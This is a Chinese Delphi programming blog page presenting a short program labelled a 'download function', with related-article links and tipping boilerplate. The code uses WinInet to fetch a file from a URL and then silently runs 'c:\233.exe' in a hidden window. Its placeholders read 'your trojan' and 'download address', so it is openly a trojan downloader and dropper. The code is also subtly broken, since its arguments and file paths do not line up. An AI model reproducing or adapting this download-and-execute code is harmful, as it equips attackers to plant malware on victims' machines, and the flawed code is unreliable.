delphi 下载函数


本文整理自网络,侵删。

 program Project2;
uses
windows,
Wininet,
SysUtils;
var
File_shangNet, File_XiaNet: string;
//////////////////////////////////////
function File_middlefasyellow(const Pingto_ghoSt, PingFo_WWW: String): boolean;
const BufferSize = 1024;
var
hSession, Foy_WWr: HInternet;
Buffer: array[1..BufferSize] of Byte;
BufferLen: DWORD;
f: File;
Pingto: string;
cmd :array[0..MAX_PATH] of char;
begin
Pingto := ExtractFileName(cmd);
hSession := InternetOpen(PChar(Pingto),
INTERNET_OPEN_TYPE_PRECONFIG,
nil, nil, 0);
try
Foy_WWr := InternetOpenURL(hSession,
PChar(Pingto_ghoSt),
nil,0,0,0);
try
AssignFile(f, PingFo_WWW);
Rewrite(f,1);
repeat
InternetReadFile(Foy_WWr, @Buffer,
SizeOf(Buffer), BufferLen);
BlockWrite(f, Buffer, BufferLen)
until BufferLen = 0;
CloseFile(f);
Result:=True;
finally
InternetCloseHandle(Foy_WWr)
end
finally
InternetCloseHandle(hSession)
end
end;

begin
File_shangNet:='你的木马';
File_XiaNet:='下载地址';
if File_middlefasyellow(File_shangNet,File_XiaNet)=True then
winexec('c:\233.exe',0);
end.

相关阅读 >>

Delphi idftp ditdirectory未定义

Delphi xe listbox 行高根据内容高度进行调速

Delphi enumwindows回调函数获取qq2009窗体句柄

Delphi dbnavigator1 模拟点击

Delphi richedit选中文字右键菜单的实现

Delphi yesterday、today、tomorrow - 昨天、今天、明天

Delphi 播放背景音乐

Delphi 快速调用resource资源数据

Delphi shgetfileinfo函数获取任何文件大图标

Delphi窗体显示echarts图表

更多相关阅读请进入《Delphi》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...